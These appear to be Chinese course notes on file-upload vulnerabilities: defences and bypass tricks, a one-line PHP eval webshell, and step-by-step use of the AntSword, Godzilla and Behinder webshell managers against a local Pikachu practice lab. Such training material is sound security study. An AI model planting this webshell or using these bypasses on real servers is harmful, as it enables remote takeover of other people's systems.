1. 文件上传防御手段及绕过手段总结
防御手段:客户端前端限制,黑名单限制,服务队MIME限制,getimagesize限制等等
绕过手段:抓包替换,前端js代码绕过,大小写绕过,图片文字复写,ini文件,htaccess等。
练习过程:
pikachu漏洞练习第七章不安全的文件上传(客户端check)练习收获-优快云博客
pikachu漏洞练习第七章不安全的文件上传(MIME)练习收获-优快云博客
pikachu漏洞练习第七章不安全的文件上传getimagesize()练习收获-优快云博客
2. 文件上传常用一句话木马
<?php @eval($_POST['shell']);?>
新建一个php文件键入如上代码,post后面中括号里面的内容是使用蚁剑连接时的密码。
3. 课中所讲的三种webshell管理工具的使用方法(演示使用该工具连接webshell及抓取流量包进行分析特征)
蚂蚁剑
把一句话木马植入到目标网址的服务器文件夹下。
右键添加数据,输入要连接的url地址,输入连接密码。
设置一下代理,端口号与burpsite的保持一致。
连接成功后右键就可以选择进行数据操作等等功能
打开brupsite可查看我们发送的数据包。
哥斯拉
打开Godzilla后点击管理生成一个一句话木马
选择好有效载荷为php。生成后发送到靶场服务器中。这里因为是本地靶场演示所以就直接生成到本地靶场位置中了。
根据上传的文件进行配置url地址。密码,代理类型,有效载荷,加密器要和我们之前插入的木马一致。代理主机地址要与burpsite一致。
右键目标后就能看到信息。
冰蝎
点击冰蝎主界面的选项卡中选中传输协议,选择协议名称后生成服务端生成一句话木马。
在要攻击的靶场服务器上传木马。
在空白框新建系统shell,填写url地址和密码,选择脚本类型为php,传输协议选择和生成密码时相同的协议,保存。
点击代理,选择http类型,ip和端口使用本地的。
新建连接,填入植入的url地址。填写协议和脚本类型要和植入的木马相同。再点击新建的连接就可以连接网页。

4. 文件上传无回显如何查找webshell地址
查看网页源代码和服务器日志,查看网页报错页面,利用bp抓包分析等等。
5. 文件上传表单的无参/有参情况下构造表单
一些开源项目的渗透测试中,以及知道后端哪个文件接收上传的文件以及路径后,我们就可在前端构造表单上传文件。
例:
<form action="upload_file.php" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
以上是以post的方式把文件提交到当前路径下的upload_file.php文件解析,action后就是后端要接收的文件,具体路径依实际决定。
https://blog.youkuaiyun.com/qq_46425352/article/details/123162499